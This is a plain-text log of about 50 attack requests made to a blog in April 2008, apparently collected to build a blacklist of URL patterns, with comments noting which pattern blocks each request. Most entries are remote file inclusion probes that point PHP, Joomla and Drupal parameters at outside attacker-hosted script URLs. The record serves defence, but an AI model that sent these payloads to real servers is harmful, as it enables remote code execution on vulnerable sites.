// Attack Record for Building the 3G Blacklist, Part 1: Improving Site Security by Recognizing and Exploiting Server Attack Patterns // As discussed at https://perishablepress.com/building-the-3g-blacklist-part-1/ // OVERVIEW: ~ 50 total logged attacks ~ 25 blocked via double-slash method ("//") - Attacks timeframe: April 13 to April 16, 2008 - Logged entries appear in chronological order - Subdivided according to unifying attributes - Explanatory comments included throughout Note: all instances of "perishablepress.com" have been replaced by "example.com" because Google now crawls plain-text links. ================================================= ================================================= ================================================= // This first set of ten attacks blocked via "//" TIME: April 13th 2008, 10:48am 404: *https://example.com/press/2008/03/08/blacklist-candidate-number-2008-03-09//playing.php/common/db.php?commonpath=http://www.trepamontes4x4.com/digi/menu? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: commonpath=http://www.trepamontes4x4.com/digi/menu? REMOTE ADDRESS: 67.19.6.34 USER AGENT: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0 REMOTE IDENTITY: TIME: April 13th 2008, 10:48am 404: *https://example.com/press/2008/03/08/blacklist-candidate-number-2008-03-09//playing.php/common/db.php?commonpath=http://www.trepamontes4x4.com/digi/menu? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: commonpath=http://www.trepamontes4x4.com/digi/menu? REMOTE ADDRESS: 217.195.114.88 USER AGENT: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6 REMOTE IDENTITY: TIME: April 13th 2008, 10:51am 404: *https://example.com/press/2008/03/08/blacklist-candidate-number-2008-03-09//playing.php/common/db.php?commonpath=http://www.trepamontes4x4.com/digi/menu? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: commonpath=http://www.trepamontes4x4.com/digi/menu? REMOTE ADDRESS: 67.19.6.34 USER AGENT: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0 REMOTE IDENTITY: TIME: April 13th 2008, 02:47pm 404: *https://example.com/press/2007/12/17/how-to-enable-php-error-logging-via-htaccess//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.blackid.org/bo.do?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: _CCFG[_PKG_PATH_INCL]=http://www.blackid.org/bo.do?? REMOTE ADDRESS: 69.50.214.191 USER AGENT: Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;) REMOTE IDENTITY: TIME: April 13th 2008, 02:47pm 404: *https://example.com/press/2008/01/14/advanced-php-error-handling-via-htaccess//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.blackid.org/bo.do?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: _CCFG[_PKG_PATH_INCL]=http://www.blackid.org/bo.do?? REMOTE ADDRESS: 69.50.214.191 USER AGENT: Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320) REMOTE IDENTITY: TIME: April 13th 2008, 02:49pm 404: *https://example.com/press//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.blackid.org/bo.do?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: _CCFG[_PKG_PATH_INCL]=http://www.blackid.org/bo.do?? REMOTE ADDRESS: 69.50.214.191 USER AGENT: Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929 REMOTE IDENTITY: TIME: April 13th 2008, 02:49pm 404: *https://example.com/press/2008/03/18/custom-http-errors-via-htaccess//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.blackid.org/bo.do?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: _CCFG[_PKG_PATH_INCL]=http://www.blackid.org/bo.do?? REMOTE ADDRESS: 69.50.214.191 USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5 REMOTE IDENTITY: TIME: April 13th 2008, 02:49pm 404: *https://example.com/press/tag/server//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.blackid.org/bo.do?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: _CCFG[_PKG_PATH_INCL]=http://www.blackid.org/bo.do?? REMOTE ADDRESS: 69.50.214.191 USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4 REMOTE IDENTITY: TIME: April 13th 2008, 02:51pm 404: *https://example.com/press/tag/upgrade//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.blackid.org/bo.do?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: _CCFG[_PKG_PATH_INCL]=http://www.blackid.org/bo.do?? REMOTE ADDRESS: 69.50.214.191 USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5 REMOTE IDENTITY: TIME: April 13th 2008, 06:47pm 404: *https://example.com/press/wp-content/online/code//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.labcorp.co.kr/labcorp_system//skin/zero_vote/test?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: mosConfig_live_site=http://www.labcorp.co.kr/labcorp_system//skin/zero_vote/test?? REMOTE ADDRESS: 84.40.17.23 USER AGENT: Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;) REMOTE IDENTITY: // This attack blocked via "/components/" TIME: April 13th 2008, 07:35pm 404: *https://example.com/press/wp-content/online/code/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://211.233.58.69/~seocholaw/bbs/test?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: mosConfig_live_site=http://211.233.58.69/~seocholaw/bbs/test?? REMOTE ADDRESS: 87.230.7.194 USER AGENT: Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;) REMOTE IDENTITY: // This set of three attacks blocked via "//" TIME: April 13th 2008, 08:29pm 404: *https://example.com/press/2008/02/18/quickly-disable-or-enable-all-wordpress-plugins-via-the-database//top10.php/common/db.php?commonpath=http://bnb-chambresdhotes.ch///components/com_easygallery/bo.do?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: commonpath=http://bnb-chambresdhotes.ch///components/com_easygallery/bo.do?? REMOTE ADDRESS: 69.93.107.242 USER AGENT: Avant Browser (http://www.avantbrowser.com) REMOTE IDENTITY: TIME: April 13th 2008, 08:34pm 404: *https://example.com/press/2006/05/29/wordpress-plugin-central//top10.php/common/db.php?commonpath=http://bnb-chambresdhotes.ch///components/com_easygallery/bo.do?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: commonpath=http://bnb-chambresdhotes.ch///components/com_easygallery/bo.do?? REMOTE ADDRESS: 69.93.107.242 USER AGENT: Avant Browser (http://www.avantbrowser.com) REMOTE IDENTITY: TIME: April 13th 2008, 10:01pm 404: *https://example.com/press/2007/11/14/easily-adaptable-wordpress-loop-templates//nav2.php/common/db.php?commonpath=http://bnb-chambresdhotes.ch///components/com_easygallery/bo.do?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: commonpath=http://bnb-chambresdhotes.ch///components/com_easygallery/bo.do?? REMOTE ADDRESS: 69.93.107.242 USER AGENT: Avant Browser (http://www.avantbrowser.com) REMOTE IDENTITY: // This attack blocked via "/components/" TIME: April 14th 2008, 02:03am 404: *https://example.com/press/wp-content/online/code/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://qsystemsonline.biz/riCo?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: mosConfig_live_site=http://qsystemsonline.biz/riCo?? REMOTE ADDRESS: 66.201.232.41 USER AGENT: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4 REMOTE IDENTITY: // This set of three attacks blocked via "//" TIME: April 14th 2008, 02:31pm 404: *https://example.com/press/page/2//app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=http://www.sohbetsuper.org/modules/shoutbox/box?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: BEAUT_PATH=http://www.sohbetsuper.org/modules/shoutbox/box?? REMOTE ADDRESS: 128.121.21.48 USER AGENT: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0 REMOTE IDENTITY: TIME: April 14th 2008, 02:31pm 404: *https://example.com/press/2008/03/08/blacklist-candidate-number-2008-03-09//app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=http://www.sohbetsuper.org/modules/shoutbox/box?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: BEAUT_PATH=http://www.sohbetsuper.org/modules/shoutbox/box?? REMOTE ADDRESS: 128.121.21.48 USER AGENT: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0 REMOTE IDENTITY: TIME: April 14th 2008, 02:35pm 404: *https://example.com/press/wp-content/online/code//app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=http://www.sohbetsuper.org/modules/shoutbox/box?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: BEAUT_PATH=http://www.sohbetsuper.org/modules/shoutbox/box?? REMOTE ADDRESS: 128.121.21.48 USER AGENT: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0 REMOTE IDENTITY: // This attack blocked via "/header.php" TIME: April 14th 2008, 10:56pm 404: *https://example.com/press/error.php/header.php?prefix=http://bnb-chambresdhotes.ch///components/com_easygallery/bo.do?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: prefix=http://bnb-chambresdhotes.ch///components/com_easygallery/bo.do?? REMOTE ADDRESS: 72.10.167.50 USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4 REMOTE IDENTITY: // This set of two attacks blocked via "//" TIME: April 15th 2008, 01:00am 404: *https://example.com/press/wp-content/online/code//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bnb-chambresdhotes.ch///components/com_easygallery/bo.do?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: cropimagedir=http://bnb-chambresdhotes.ch///components/com_easygallery/bo.do?? REMOTE ADDRESS: 72.10.167.50 USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4 REMOTE IDENTITY: TIME: April 15th 2008, 01:00am 404: *https://example.com/press/page/2//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bnb-chambresdhotes.ch///components/com_easygallery/bo.do?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: cropimagedir=http://bnb-chambresdhotes.ch///components/com_easygallery/bo.do?? REMOTE ADDRESS: 72.10.167.50 USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4 REMOTE IDENTITY: // This set of five attacks blocked via "/decoder/", "/config/", and ..? TIME: April 15th 2008, 10:51am 404: *https://example.com/press/2008/03/08/blacklist-candidate-number-2008-03-09/file.php?/?mosConfig_absolute_path=%20%22Joomla%22%20%22Joomla%22http://aceperform.890m.com/test.txt? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: /?mosConfig_absolute_path=%20%22Joomla%22%20%22Joomla%22http://aceperform.890m.com/test.txt? REMOTE ADDRESS: 203.22.204.188 USER AGENT: Mozilla/1.22 (compatible; MSIE 1.5; Windows NT) REMOTE IDENTITY: TIME: April 15th 2008, 12:09pm 404: *https://example.com/press/2008/01/16/comprehensive-htaccess-canonicalization-for-wordpress/%22index.php?p=%22http://200.220.215.214/~teste/xpl/test.txt??? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: p=%22http://200.220.215.214/~teste/xpl/test.txt??? REMOTE ADDRESS: 91.151.93.132 USER AGENT: Mozilla/1.22 (compatible; MSIE 1.5; Windows NT) REMOTE IDENTITY: TIME: April 15th 2008, 07:50pm 404: *https://example.com/press/2008/02/26/2g-blacklist-closing-the-door-on-malicious-attacks/config/dbutil.php?confdir=http://www.blackid.org/bo.do?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: confdir=http://www.blackid.org/bo.do?? REMOTE ADDRESS: 69.50.214.191 USER AGENT: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1) REMOTE IDENTITY: TIME: April 15th 2008, 07:51pm 404: *https://example.com/press/2008/03/26/content-negotiation-for-xhtml-documents-via-php-and-htaccess/config/dbutil.php?confdir=http://www.blackid.org/bo.do?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: confdir=http://www.blackid.org/bo.do?? REMOTE ADDRESS: 69.50.214.191 USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5 REMOTE IDENTITY: TIME: April 15th 2008, 08:55pm 404: *https://example.com/press/2008/03/26/content-negotiation-for-xhtml-documents-via-php-and-htaccess/decoder/markdown.php?ccms_library_path=http://www.blackid.org/bo.do?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: ccms_library_path=http://www.blackid.org/bo.do?? REMOTE ADDRESS: 66.98.214.4 USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1 REMOTE IDENTITY: // This set of twelve attacks blocked via "index.php" (not advised) or some other method? TIME: April 16th 2008, 06:40am 404: *https://example.com/press/2007/11/14/easily-adaptable-wordpress-loop-templates/index.php?file=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: file=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? REMOTE ADDRESS: 84.16.226.111 USER AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727) REMOTE IDENTITY: TIME: April 16th 2008, 06:40am 404: *https://example.com/press/2007/11/14/easily-adaptable-wordpress-loop-templates/index.php?file=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: file=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? REMOTE ADDRESS: 80.91.118.150 USER AGENT: Mozilla/1.22 (compatible; MSIE 1.5; Windows NT) REMOTE IDENTITY: TIME: April 16th 2008, 06:40am 404: *https://example.com/press/2006/08/28/blogstats-pcc-plugin/index.php?file=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: file=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? REMOTE ADDRESS: 80.91.118.150 USER AGENT: Mozilla/1.22 (compatible; MSIE 1.5; Windows NT) REMOTE IDENTITY: TIME: April 16th 2008, 06:41am 404: *https://example.com/press/2006/08/28/blogstats-pcc-plugin/index.php?file=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: file=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? REMOTE ADDRESS: 84.16.226.111 USER AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727) REMOTE IDENTITY: TIME: April 16th 2008, 06:42am 404: *https://example.com/press/2007/11/14/easily-adaptable-wordpress-loop-templates/index.php?file=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: file=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? REMOTE ADDRESS: 85.17.170.17 USER AGENT: Mozilla/3.0 (X11; I; SunOS 5.4 sun4m) REMOTE IDENTITY: TIME: April 16th 2008, 06:45am 404: *https://example.com/press/2006/08/28/blogstats-pcc-plugin/index.php?file=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: file=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? REMOTE ADDRESS: 85.17.170.17 USER AGENT: Mozilla/3.0 (X11; I; SunOS 5.4 sun4m) REMOTE IDENTITY: TIME: April 16th 2008, 07:19am 404: *https://example.com/press/2007/10/01/htaccess-combo-pack-wordpress-permalinks-and-non-www-redirect/index.php?l=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: l=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? REMOTE ADDRESS: 80.91.118.150 USER AGENT: Mozilla/1.22 (compatible; MSIE 1.5; Windows NT) REMOTE IDENTITY: TIME: April 16th 2008, 07:20am 404: *https://example.com/press/2008/01/16/comprehensive-htaccess-canonicalization-for-wordpress/index.php?l=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: l=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? REMOTE ADDRESS: 80.91.118.150 USER AGENT: Mozilla/1.22 (compatible; MSIE 1.5; Windows NT) REMOTE IDENTITY: TIME: April 16th 2008, 07:25am 404: *https://example.com/press/2007/10/01/htaccess-combo-pack-wordpress-permalinks-and-non-www-redirect/index.php?l=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: l=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? REMOTE ADDRESS: 80.91.118.150 USER AGENT: Mozilla/1.22 (compatible; MSIE 1.5; Windows NT) REMOTE IDENTITY: TIME: April 16th 2008, 07:26am 404: *https://example.com/press/2008/01/16/comprehensive-htaccess-canonicalization-for-wordpress/index.php?l=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: l=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? REMOTE ADDRESS: 80.91.118.150 USER AGENT: Mozilla/1.22 (compatible; MSIE 1.5; Windows NT) REMOTE IDENTITY: TIME: April 16th 2008, 07:33am 404: *https://example.com/press/2007/10/01/htaccess-combo-pack-wordpress-permalinks-and-non-www-redirect/index.php?l=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: l=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? REMOTE ADDRESS: 85.17.170.17 USER AGENT: Mozilla/3.0 (X11; I; SunOS 5.4 sun4m) REMOTE IDENTITY: TIME: April 16th 2008, 07:33am 404: *https://example.com/press/2008/01/16/comprehensive-htaccess-canonicalization-for-wordpress/index.php?l=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: l=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? REMOTE ADDRESS: 85.17.170.17 USER AGENT: Mozilla/3.0 (X11; I; SunOS 5.4 sun4m) REMOTE IDENTITY: // This attack blocked via "7c" TIME: April 16th 2008, 10:53am 404: *https://example.com/press/2006/03/08/trackback-cold-tuf/%7c%7c0%7c0/ SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: https://example.com/press/2006/03/08/trackback-cold-tuf/||0|0 QUERY STRING: REMOTE ADDRESS: 89.149.208.23 USER AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) REMOTE IDENTITY: // This set of two attacks blocked via "/components/" TIME: April 16th 2008, 11:01am 404: *https://example.com/press/wp-content/online/code/components/com_mp3_allopass/allopass.php?mosConfig_live_site=? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: mosConfig_live_site=? REMOTE ADDRESS: 87.106.179.153 USER AGENT: Mozilla/4.8 [en] (Windows NT 5.0; U) REMOTE IDENTITY: TIME: April 16th 2008, 11:01am 404: *https://example.com/press/wp-content/online/code/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: mosConfig_absolute_path=? REMOTE ADDRESS: 87.106.179.153 USER AGENT: Mozilla/4.8 [en] (Windows NT 5.0; U) REMOTE IDENTITY: // This attack blocked via "/drupal/" (note: Drupal-related resources are a FREQUENT target for attacks) TIME: April 16th 2008, 11:58am 404: *https://example.com/press/wp-content/online/code/drupal/?_menu[callbacks][1][callback]=? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: _menu[callbacks][1][callback]=? REMOTE ADDRESS: 87.106.179.153 USER AGENT: Mozilla/4.8 [en] (Windows NT 5.0; U) REMOTE IDENTITY: // This set of three attacks blocked via "//" TIME: April 16th 2008, 03:53pm 404: *https://example.com/press/tag/php//includes/kb_constants.php?module_root_path=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: module_root_path=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? REMOTE ADDRESS: 218.150.160.162 USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1 REMOTE IDENTITY: TIME: April 16th 2008, 03:53pm 404: *https://example.com/press/2008/01/14/advanced-php-error-handling-via-htaccess//includes/kb_constants.php?module_root_path=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: module_root_path=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? REMOTE ADDRESS: 218.150.160.162 USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1 REMOTE IDENTITY: TIME: April 16th 2008, 04:12pm 404: *https://example.com/press/wp-content/online/code//mcf.php?content=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: content=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? REMOTE ADDRESS: 80.91.118.150 USER AGENT: Microsoft Internet Explorer/4.0b1 (Windows 95) REMOTE IDENTITY: // This set of two attacks blocked via "/components/" TIME: April 16th 2008, 04:13pm 404: *https://example.com/press/wp-content/online/code/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: mosConfig_absolute_http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? REMOTE ADDRESS: 80.91.118.150 USER AGENT: Microsoft Internet Explorer/4.0b1 (Windows 95) REMOTE IDENTITY: TIME: April 16th 2008, 04:13pm 404: *https://example.com/press/wp-content/online/code/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: mosConfig_absolute_http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? REMOTE ADDRESS: 80.91.118.150 USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1 REMOTE IDENTITY: // This set of two attacks blocked via "//" TIME: April 16th 2008, 04:25pm 404: *https://example.com/press/2008/04/08/three-unsolved-wordpress-mysteries//includes/kb_constants.php?module_root_path=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: module_root_path=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? REMOTE ADDRESS: 218.150.160.162 USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1 REMOTE IDENTITY: TIME: April 16th 2008, 04:34pm 404: *https://example.com/press/wp-content/online/code//mcf.php?content=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? SITE: https://example.com/ SOURCE: Perishable/Perishable REFERRER: QUERY STRING: content=http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? REMOTE ADDRESS: 85.17.170.17 USER AGENT: Microsoft Pocket Internet Explorer/0.6 REMOTE IDENTITY: // x.